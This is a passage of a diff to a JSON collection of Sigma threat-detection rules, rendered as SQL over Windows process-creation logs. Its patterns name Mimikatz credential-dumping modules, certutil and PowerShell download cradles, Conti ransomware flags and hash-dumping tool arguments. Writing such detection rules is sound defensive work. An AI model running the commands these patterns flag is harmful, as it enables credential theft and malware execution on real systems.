'%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\'))" ], - "filename": "image_load_susp_uncommon_image_load.yml" + "filename": "proc_creation_win_sdiagnhost_susp_child.yml" }, { - "title": "Suspicious UltraVNC Execution", - "id": "871b9555-69ca-4993-99d3-35a59f9f3599", + "title": "HackTool - Mimikatz Execution", + "id": "a642964e-bead-4bed-8910-1bb4d63e3b4d", "status": "test", - "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)", - "author": "Bhabesh Raj", + "description": "Detection well-known mimikatz command line arguments", + "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", "tags": [ - "attack.lateral_movement", - "attack.g0047", - "attack.t1021.005" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-autoreconnect %' ESCAPE '\\' AND CommandLine LIKE '%-connect %' ESCAPE '\\' AND CommandLine LIKE '%-id:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%DumpCreds%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz%' ESCAPE '\\') OR (CommandLine LIKE '%::aadcookie%' ESCAPE '\\' OR CommandLine LIKE '%::detours%' ESCAPE '\\' OR CommandLine LIKE '%::memssp%' ESCAPE '\\' OR CommandLine LIKE '%::mflt%' ESCAPE '\\' OR CommandLine LIKE '%::ncroutemon%' ESCAPE '\\' OR CommandLine LIKE '%::ngcsign%' ESCAPE '\\' OR CommandLine LIKE '%::printnightmare%' ESCAPE '\\' OR CommandLine LIKE '%::skeleton%' ESCAPE '\\' OR CommandLine LIKE '%::preshutdown%' ESCAPE '\\' OR CommandLine LIKE '%::mstsc%' ESCAPE '\\' OR CommandLine LIKE '%::multirdp%' ESCAPE '\\') OR (CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%crypto::%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%process::%' ESCAPE '\\' OR CommandLine LIKE '%vault::%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ultravnc_susp_execution.yml" + "filename": "proc_creation_win_hktl_mimikatz_command_line.yml" }, { - "title": "Suspicious File Execution From Internet Hosted WebDav Share", - "id": "f0507c0f-a3a2-40f5-acc6-7f543c334993", - "status": "experimental", - "description": "Detects the execution of the \"net use\" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files", - "author": "pH-T (Nextron Systems)", + "title": "Suspicious Rundll32 Activity Invoking Sys File", + "id": "731231b9-0b5d-4219-94dd-abb6959aa7ea", + "status": "test", + "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe%' ESCAPE '\\' OR OriginalFileName = 'Cmd.EXE') AND (CommandLine LIKE '% net use http%' ESCAPE '\\' AND CommandLine LIKE '%& start /b %' ESCAPE '\\' AND CommandLine LIKE '%\\\\DavWWWRoot\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' OR CommandLine LIKE '%.dll %' ESCAPE '\\' OR CommandLine LIKE '%.bat %' ESCAPE '\\' OR CommandLine LIKE '%.vbs %' ESCAPE '\\' OR CommandLine LIKE '%.ps1 %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND (CommandLine LIKE '%.sys,%' ESCAPE '\\' OR CommandLine LIKE '%.sys %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_net_use_and_exec_combo.yml" + "filename": "proc_creation_win_rundll32_sys.yml" }, { - "title": "Renamed PAExec Execution", - "id": "c4e49831-1496-40cf-8ce1-b53f942b02f9", - "status": "test", - "description": "Detects execution of renamed version of PAExec. Often used by attackers", - "author": "Florian Roth (Nextron Systems), Jason Lynch", + "title": "Mshtml DLL RunHTMLApplication Abuse", + "id": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", + "status": "experimental", + "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\..\\\\%' ESCAPE '\\' AND CommandLine LIKE '%mshtml%' ESCAPE '\\' AND CommandLine LIKE '%RunHTMLApplication%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_rundll32_mshtml_runhtmlapplication.yml" + }, + { + "title": "CMSTP Execution Process Creation", + "id": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.execution", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Weird admins that rename their tools", - "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", - "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'PAExec Application' OR OriginalFileName = 'PAExec.exe' OR Product LIKE '%PAExec%' ESCAPE '\\' OR Imphash IN ('11D40A7B7876288F919AB819CC2D9802', '6444f8a34e99b8f7d9647de66aabe516', 'dfd6aa3f7b2b1035b76b718f1ddc689f', '1a6cca4d5460b1710a12dea39e4a592c') OR (Hashes LIKE '%IMPHASH=11D40A7B7876288F919AB819CC2D9802%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6444f8a34e99b8f7d9647de66aabe516%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1a6cca4d5460b1710a12dea39e4a592c%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\paexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\PAExec-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_paexec.yml" + "filename": "proc_creation_win_cmstp_execution_by_creation.yml" }, { - "title": "PUA - Radmin Viewer Utility Execution", - "id": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", + "title": "ZOHO Dctask64 Process Injection", + "id": "6345b048-8441-43a7-9bed-541133633d7a", "status": "test", - "description": "Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines", - "author": "frack113", + "description": "Detects suspicious process injection using ZOHO's dctask64.exe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1072" + "attack.defense_evasion", + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Radmin Viewer' OR Product = 'Radmin Viewer' OR OriginalFileName = 'Radmin.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\dctask64.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%DesktopCentral\\_Agent\\\\agent%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_radmin.yml" + "filename": "proc_creation_win_lolbin_dctask64_proc_inject.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Execution", - "id": "93bbde78-dc86-4e73-9ffc-ff8a384ca89c", + "title": "Suspicious Add Scheduled Command Pattern", + "id": "f2c64357-b1d2-41b7-849f-34d2682c0fad", "status": "experimental", - "description": "Detects execution of known compromised version of 3CXDesktopApp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious scheduled task creations with commands that are uncommon", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Legitimate usage of 3CXDesktopApp" + "Software installers that run from temporary folders and also install scheduled tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((OriginalFileName = '3CXDesktopApp.exe' OR NewProcessName LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' OR Product = '3CX Desktop App') AND FileVersion LIKE '%18.12.%' ESCAPE '\\') OR ((Hashes LIKE '%SHA256=DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC%' ESCAPE '\\' OR Hashes LIKE '%SHA256=54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=480DC408EF50BE69EBCF84B95750F7E93A8A1859%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3B43A5D8B83C637D00D769660D01333E88F5A187%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA%' ESCAPE '\\' OR Hashes LIKE '%MD5=BB915073385DD16A846DFA318AFA3C19%' ESCAPE '\\' OR Hashes LIKE '%MD5=08D79E1FFFA244CC0DC61F7D2036ACA9%' ESCAPE '\\' OR Hashes LIKE '%MD5=4965EDF659753E3C05D800C6C8A23A7A%' ESCAPE '\\' OR Hashes LIKE '%SHA256=FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203%' ESCAPE '\\' OR Hashes LIKE '%SHA1=E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8433A94AEDB6380AC8D4610AF643FB0E5220C5CB%' ESCAPE '\\' OR Hashes LIKE '%SHA1=413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5%' ESCAPE '\\' OR Hashes LIKE '%MD5=9833A4779B69B38E3E51F04E395674C6%' ESCAPE '\\' OR Hashes LIKE '%MD5=704DB9184700481A56E5100FB56496CE%' ESCAPE '\\' OR Hashes LIKE '%MD5=8EE6802F085F7A9DF7E0303E65722DC0%' ESCAPE '\\' OR Hashes LIKE '%SHA256=AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868%' ESCAPE '\\' OR Hashes LIKE '%SHA256=59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E%' ESCAPE '\\' OR Hashes LIKE '%MD5=F3D4144860CA10BA60F7EF4D176CC736%' ESCAPE '\\' OR Hashes LIKE '%MD5=0EEB1C0133EB4D571178B2D9D14CE3E9%' ESCAPE '\\') OR sha256 IN ('DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC', '54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02', 'D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE', 'FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405', '5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734', 'A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203', 'AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868', '59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983') OR sha1 IN ('480DC408EF50BE69EBCF84B95750F7E93A8A1859', '3B43A5D8B83C637D00D769660D01333E88F5A187', '6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA', 'E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1', '8433A94AEDB6380AC8D4610AF643FB0E5220C5CB', '413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5', 'BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA', 'BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E') OR md5 IN ('BB915073385DD16A846DFA318AFA3C19', '08D79E1FFFA244CC0DC61F7D2036ACA9', '4965EDF659753E3C05D800C6C8A23A7A', '9833A4779B69B38E3E51F04E395674C6', '704DB9184700481A56E5100FB56496CE', '8EE6802F085F7A9DF7E0303E65722DC0', 'F3D4144860CA10BA60F7EF4D176CC736', '0EEB1C0133EB4D571178B2D9D14CE3E9'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\') AND (((CommandLine LIKE '%/sc minute %' ESCAPE '\\' OR CommandLine LIKE '%/ru system %' ESCAPE '\\') AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) OR (CommandLine LIKE '% bypass %' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% IEX%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '%/c start /min %' ESCAPE '\\' OR CommandLine LIKE '% curl %' ESCAPE '\\') OR (CommandLine LIKE '%/xml C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_3cx_compromise_execution.yml" + "filename": "proc_creation_win_schtasks_susp_pattern.yml" }, { - "title": "SafeBoot Registry Key Deleted Via Reg.EXE", - "id": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", + "title": "Renamed Mavinject.EXE Execution", + "id": "e6474a1b-5390-49cd-ab41-8d88655f7394", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products", - "author": "Nasreddine Bencherchali (Nextron Systems), Tim Shelton", + "description": "Detects the execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", + "author": "frack113, Florian Roth", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.privilege_escalation", + "attack.t1055.001", + "attack.t1218.013" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName IN ('mavinject32.exe', 'mavinject64.exe') AND NOT ((NewProcessName LIKE '%\\\\mavinject32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mavinject64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_delete_safeboot.yml" + "filename": "proc_creation_win_renamed_mavinject.yml" }, { - "title": "PowerShell Base64 Encoded Shellcode", - "id": "2d117e49-e626-4c7c-bd1f-c3c0147774c8", - "status": "stable", - "description": "Detects Base64 encoded Shellcode", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious File Downloaded From Direct IP Via Certutil.EXE", + "id": "13e6fe51-d478-4c7e-b0f2-6da9b400a829", + "status": "experimental", + "description": "Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.t1027" @@ -6786,18 +6616,18 @@ "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR CommandLine LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_base64_shellcode.yml" + "filename": "proc_creation_win_certutil_download_direct_ip.yml" }, { - "title": "Potential PsExec Remote Execution", - "id": "ea011323-7045-460b-b2d7-0f7442ea6b38", - "status": "experimental", - "description": "Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Formbook Process Creation", + "id": "032f5fb3-d959-41a5-9263-4173c802dc2b", + "status": "test", + "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ "attack.resource_development", "attack.t1587.001" @@ -6807,90 +6637,86 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%accepteula%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentCommandLine LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND ParentCommandLine LIKE '%.exe' ESCAPE '\\') AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%type nul >%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')) AND CommandLine LIKE '%.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_psexec_remote_execution.yml" + "filename": "proc_creation_win_malware_formbook.yml" }, { - "title": "Regsvr32 Anomaly", - "id": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", - "status": "experimental", - "description": "Detects various anomalies in relation to regsvr32.exe", - "author": "Florian Roth (Nextron Systems), oscd.community, Tim Shelton", + "title": "Potential Conti Ransomware Activity", + "id": "689308fc-cfba-4f72-9897-796c1dc61487", + "status": "test", + "description": "Detects a specific command used by the Conti ransomware group", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.010", - "car.2019-04-002", - "car.2019-04-003" + "attack.impact", + "attack.s0575", + "attack.t1486" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%ftp%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\..\\\\Windows\\\\System32\\\\regsvr32.exe %' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.bin' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebEx64\\\\Meetings\\\\atucfobj.dll%' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Program Files\\\\Box\\\\Box\\\\FS\\\\streem.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Box\\\\Box\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/s C:\\\\Windows\\\\System32\\\\RpcProxy\\\\RpcProxy.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-net %' ESCAPE '\\' AND CommandLine LIKE '%-size %' ESCAPE '\\' AND CommandLine LIKE '%-nomutex %' ESCAPE '\\' AND CommandLine LIKE '%-p \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')" ], - "filename": "proc_creation_win_regsvr32_anomalies.yml" + "filename": "proc_creation_win_malware_conti_ransomware_commands.yml" }, { - "title": "HackTool - LocalPotato Execution", - "id": "6bd75993-9888-4f91-9404-e1e4e4e34b77", + "title": "HackTool - Quarks PwDump Execution", + "id": "0685b176-c816-4837-8e7b-1216f346636b", "status": "experimental", - "description": "Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples", + "description": "Detects usage of the Quarks PwDump tool via commandline arguments", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "cve.2023.21746" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\LocalPotato.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe -i C:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%-o Windows\\\\%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=E1742EE971D6549E8D4D81115F88F1FC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DD82066EFBA94D7556EF582F247C8BB5%' ESCAPE '\\') OR Imphash IN ('E1742EE971D6549E8D4D81115F88F1FC', 'DD82066EFBA94D7556EF582F247C8BB5')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\QuarksPwDump.exe' ESCAPE '\\' OR CommandLine IN (' -dhl', ' --dump-hash-local', ' -dhdc', ' --dump-hash-domain-cached', ' --dump-bitlocker', ' -dhd ', ' --dump-hash-domain ', '--ntds-file')))" ], - "filename": "proc_creation_win_hktl_localpotato.yml" + "filename": "proc_creation_win_hktl_quarks_pwdump.yml" }, { - "title": "Renamed Sysinternals Sdelete Execution", - "id": "c1d867fe-8d95-4487-aab4-e53f2d339f90", - "status": "experimental", - "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", - "author": "Florian Roth (Nextron Systems)", + "title": "Execution via CL_Invocation.ps1", + "id": "a0459f02-ac51-4c09-b511-b8c9203fc429", + "status": "test", + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.impact", - "attack.t1485" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ - "System administrator usage" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'sdelete.exe' AND NOT ((NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND CommandLine LIKE '%SyncInvoke%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_sysinternals_sdelete.yml" + "filename": "proc_creation_win_lolbin_cl_invocation.yml" }, { - "title": "Suspicious Elevated System Shell", - "id": "178e615d-e666-498b-9630-9ed363038101", + "title": "Suspicious Invoke-WebRequest Execution", + "id": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", "status": "experimental", - "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", - "author": "frack113, Tim Shelton 